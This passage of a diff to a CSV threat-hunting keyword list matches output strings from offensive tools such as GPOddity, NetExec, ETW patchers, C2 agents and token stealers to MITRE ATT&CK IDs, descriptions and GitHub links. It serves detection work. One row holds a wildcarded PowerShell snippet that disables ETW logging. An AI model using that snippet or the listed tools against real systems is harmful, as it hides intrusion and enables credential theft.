T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*[#] Ready For ETW Patch.*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" -"*[*] Downloading the legitimate GPO from SYSVOL*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[*] Injecting malicious scheduled task into downloaded GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[*] Smuggling in HTML*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*[*] Smuggling in SVG*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" -"*[*] Updating downloaded GPO version number to ensure automatic GPO application*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*[*] Downloading the legitimate GPO from SYSVOL*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[*] Injecting malicious scheduled task into downloaded GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[*] Smuggling in HTML*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*[*] Smuggling in SVG*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*[*] Updating downloaded GPO version number to ensure automatic GPO application*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*[-] failed to spawn shell: %s*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*[-] kernel not vulnerable*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*[-] Seems like we killed auditd. Ooopsie :D*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" -"*[+] Adding your DLL to the LSA Security Packages registry key*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Adding your DLL to the LSA Security Packages registry key*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] Attack aborted. Exiting*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"*[+] Attempting to call the target EXE from the mock directory*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Attempting to call the target EXE from the mock directory*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] auditd patched successfully*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*[+] Back to C&C Console*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*[+] Bof replay:*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" -"*[+] Creating mock directories*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Bof replay:*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*[+] Creating mock directories*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] Deobfuscated dump saved in file decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" -"*[+] Enumerating driver services...*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Enumerating driver services...*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] ETW Patched, No Logs No Crime !*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" -"*[+] Generated XOR key: *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" +"*[+] Generated XOR key: *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" "*[+] Generating base64 encoded PowerShell script*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*[+] Keylogger started*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*[+] Keylogger stopped*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*[+] keystrokes dump from agent*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*[+] Opened Process Token Sucessufully!*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" -"*[+] Registry key set. DLL will be loaded on reboot*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*[+] Safety checks passed. Implanting your DLL*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*[+] Save encrypted shellcode to *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*[+] SeImpersonatePrivilege enabled*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*[+] Registry key set. DLL will be loaded on reboot*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Safety checks passed. Implanting your DLL*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Save encrypted shellcode to *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] SeImpersonatePrivilege enabled*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*[+] Stole token from*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" -"*[+] Successfully downloaded legitimate GPO from SYSVOL to *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[+] Successfully injected malicious scheduled task*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[+] Successfully spoofed GPC gPCFileSysPath attribute*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*[+] The encrypted payload with *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*[+] Your payload must be executed now !*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*[+] Successfully downloaded legitimate GPO from SYSVOL to *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] Successfully injected malicious scheduled task*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] Successfully spoofed GPC gPCFileSysPath attribute*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] The encrypted payload with *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] Your payload must be executed now !*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*[i] AAD Join:*enumerate*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[i] Credman:*Credential Blob Decrypted*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[i] Hooked Ntdll Base Address : *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[i] Unhooked Ntdll Base Address: *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*","offensive_tool_keyword","powershell","impair the defenses of the targeted system by disabling ETW logging for PowerShell. This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected","T1562","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*['spawnto']*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*[x] Cannot load NTDLL.DLL*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*[x] Cannot load NTDLL.DLL*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*[X] Your harvest exploded:*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\ rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*\*.O365.GroupMembership_AdminGroups.txt*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" @@ -5939,30 +6010,32 @@ "*\\.\pipe\pwned/pipe/srvsvc*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","pipe name","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*\\:C*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed c:\\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\??\\Jormungandr*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","0","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" -"*\\\\*\\*\\Get-FileLockProcess.ps1*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information 